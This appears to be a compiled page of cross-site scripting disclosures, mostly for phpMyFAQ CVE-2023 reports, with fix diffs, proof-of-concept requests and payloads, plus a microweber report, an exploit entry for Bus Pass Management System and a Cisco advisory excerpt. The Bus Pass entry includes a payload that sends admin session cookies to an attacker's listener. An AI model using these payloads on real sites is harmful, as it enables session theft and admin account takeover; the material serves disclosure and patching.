Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

@@ -106,10 +106,10 @@ function buildStopWordsHTML(data) {

}

  

// id attribute is of the format stopword\_<id>\_<lang>

elem\_id \= buildStopWordInputElemId(data\[i\].id, data\[i\].lang);

elem\_id \= buildStopWordInputElemId(data\[i\].id, escape(data\[i\].lang));

  

html += '<td>';

html += buildStopWordInputElement(elem\_id, data\[i\].stopword);

html += buildStopWordInputElement(elem\_id, escape(data\[i\].stopword));

html += '</td>';

  

if (i % maxCols \=== maxCols \- 1) {

@@ -136,7 +136,7 @@ function buildStopWordInputElement(elementId, stopword) {

elementId \= elementId || buildStopWordInputElemId();

stopword \= stopword || '';

const attrs \= 'onblur="saveStopWord(this.id)" onkeydown="saveStopWordHandleEnter(this.id, event)" onfocus="saveOldValue(this.id)"';

return '<input class="form-control form-control-sm" id="' + elementId + '" value="' + stopword + '" ' + attrs + '>';

return '<input class="form-control form-control-sm" id="' + elementId + '" value="' + escape(stopword) + '" ' + attrs + '>';

}

  

/\*\*

@@ -286,6 +286,21 @@ function() {

);

}

}

  

const escape \= (text) \=> {

const map \= {

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#039;',

};

  

return text.replace(/\[&<>"'\]/g, (mapped) \=> {

return map\[mapped\];

});

};

  

</script\>

</div\>

</div\>

CVE-2023-1884: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@7f0f921

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

**Description**

There is a stored XSS in the 'adminlog' functionality. E.g. the page http://phpmyfaq.local/admin/?action=adminlog shows (failed) login attempts. If a user with the username '<script>alert(1);</script>' tries to log in, it gets logged and displayed on the adminlog unsanitized.

**Proof of Concept**

1.  visit http://phpmyfaq.tld/admin/index.php and try to login with <script>alert(1);</script>

after the failed login attempt, visit

*   (as admin) http://phpmyfaq.tld/admin/?action=adminlog to trigger the XSS.

You will notice the script tags being injected:

    Invalid user or password.\nLogin: <script>alert(1);</script>\nErrors: Specified login could not be found. 
    

**Fix**

sanitize $loggingValue\['text'\] in https://github.com/thorsten/phpMyFAQ/blob/5bd0f79d085feb255d893a67d2fcdac51f4cd2ec/phpmyfaq/admin/stat.adminlog.php#L123 before serving it to the admin user.

**Impact**

Taking over the admin account.

CVE-2023-1878: Stored XSS in the adminlog functionality. in phpmyfaq

Cross-site Scripting (XSS) - DOM in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

@@ -619,7 +619,7 @@ 'msgGlossary' => '<a href="./glossary.html">' . $PMF\_LANG\['ad\_menu\_glossary'\] . '</a>', 'privacyLink' => sprintf( '<a target="\_blank" href="%s">%s</a>', $faqConfig\->get('main.privacyURL'), Strings::htmlentities($faqConfig\->get('main.privacyURL')), $PMF\_LANG\['msgPrivacyNote'\] ), 'backToHome' => '<a href="./index.html">' . $PMF\_LANG\['msgHome'\] . '</a>', @@ -642,7 +642,7 @@ 'msgGlossary' => '<a href="index.php?' . $sids . 'action=glossary">' . $PMF\_LANG\['ad\_menu\_glossary'\] . '</a>', 'privacyLink' => sprintf( '<a target="\_blank" href="%s">%s</a>', $faqConfig\->get('main.privacyURL'), Strings::htmlentities($faqConfig\->get('main.privacyURL')), $PMF\_LANG\['msgPrivacyNote'\] ), 'allCategories' => '<a class="nav-link" href="index.php?' . $sids . 'action=show">' .

CVE-2023-1882: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@49db615

@@ -21,6 +21,7 @@

use phpMyFAQ\\Category\\CategoryRelation;

use phpMyFAQ\\Database;

use phpMyFAQ\\Filter;

use phpMyFAQ\\Strings;

  

if (!defined('IS\_VALID\_PHPMYFAQ')) {

http\_response\_code(400);

@@ -319,9 +320,10 @@

foreach ($category\->getCategoryTree() as $id => $cat) {

// CategoryHelper translated in this language?

if ($cat\['lang'\] == $lang) {

$categoryName = $cat\['name'\];

$categoryName = Strings::htmlentities($cat\['name'\]);

} else {

$categoryName = $cat\['name'\] . ' (' . $languageCodes\[strtoupper($cat\['lang'\])\] . ')';

$categoryName = Strings::htmlentities($cat\['name'\]) .

' (' . $languageCodes\[strtoupper($cat\['lang'\])\] . ')';

}

CVE-2023-1885: fix: added missing conversion to HTML entities · thorsten/phpMyFAQ@fecc803

Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

Valid

Reported on

Feb 17th 2023

**Description**

There is a reflected XSS in send2friend because the 'artlang' parameter is not sanitized.

**Proof of Concept**

visit http://phpmyfaq.local/?action=send2friend&artlang=aaaa"%3E%3Cscript%3Ealert(1);%3C/script%3E

**Fix**

sanitize the '$faqLanguage' variable in https://github.com/thorsten/phpMyFAQ/blob/main/phpmyfaq/send2friend.php#L70

**Impact**

Taking over the admin account.

CVE-2023-1880: Reflected XSS in send2friend.php in phpmyfaq

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.3.

Valid

Reported on

Feb 16th 2023

**Description**

Using X-Forwarded-For Header Visitor can manipulate ip to trigger xss

**Proof of Concept**

    1.Visit any url and Add Header X-Forward-For: 127.0.0.1"><image/src/onerror=prompt(8)>
    2.If admin check in dashboard xss will trigger
    
    Check This image
    >https://drive.google.com/file/d/1hNSEr5Fjnzd9n62SFspW3z7Ojs-q6cCw/view?usp=share_link
    >https://drive.google.com/file/d/1cfnIoKWtLsjRUcU4J0Qs_bU-a_Z6gPNo/view?usp=share_link
    

Disclaimer: This is my own website

**Impact**

Account takeover

CVE-2023-1881: Stored XSS From Visitor to Acc Takeover in microweber

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Code That has a Vulnerability:

                // Updates an existing category
                if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
    
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                    $image = count($uploadedFile) ? $categoryImage->getFileName(
                        $categoryId,
                        $categoryLang
                    ) : $existingImage;
    
                    $categoryData = [
                        'id' => $categoryId,
                        'lang' => $categoryLang,
                        'parent_id' => $parentId,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $image,
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                    ];
    

Code without that vulnerability:

                // Save a new category
                if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                    $categoryData = [
                        'lang' => $categoryLang,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                    ];
    

Request:

    POST /admin/?action=updatecategory HTTP/2
    Host: roy.demo.phpmyfaq.de
    Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
    Content-Length: 1934
    Origin: https://roy.demo.phpmyfaq.de
    Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="catlang"
    
    en
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="parent_id"
    
    0
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="csrf"
    
    EDITthis
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="existing_image"
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="name"
    
    <script>alert(1)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="description"
    
    </textarea><script>alert(2)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="active"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="show_home"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="user_id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="grouppermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="userpermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="restricted_users"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------14208207025422371582565391486--
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

Bus Pass Management System version 1.0 suffers persistent cross site scripting vulnerabilities.

    # Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)# Date: 2021-09-17# Exploit Author: Matteo Conti - https://deltaspike.io# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Ubuntu 18.04 - LAMP# DescriptionThe application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie># Prof of concept:- From /contact.php, send a message containing the following payload in "title" or "message" fields:<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>(the first url have to be an existing image)- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php- Your listener will receive the PHP session id.

Bus Pass Management System 1.0 Cross Site Scripting

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

**Impact**

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

CVE-2023-1756: stored XSS after XSS Filter Bypass through exporting an HTML-Document in phpmyfaq

A vulnerability in the web-based management interface of Cisco Prime Infrastructure Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user of the web-based management interface on an affected device to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following table was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability that is described in this advisory and which release included the fix for this vulnerability.
    
    Cisco Prime Infrastructure Release
    
    First Fixed Release
    
    Earlier than 3.10.3
    
    3.10.3
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

Tag

#xss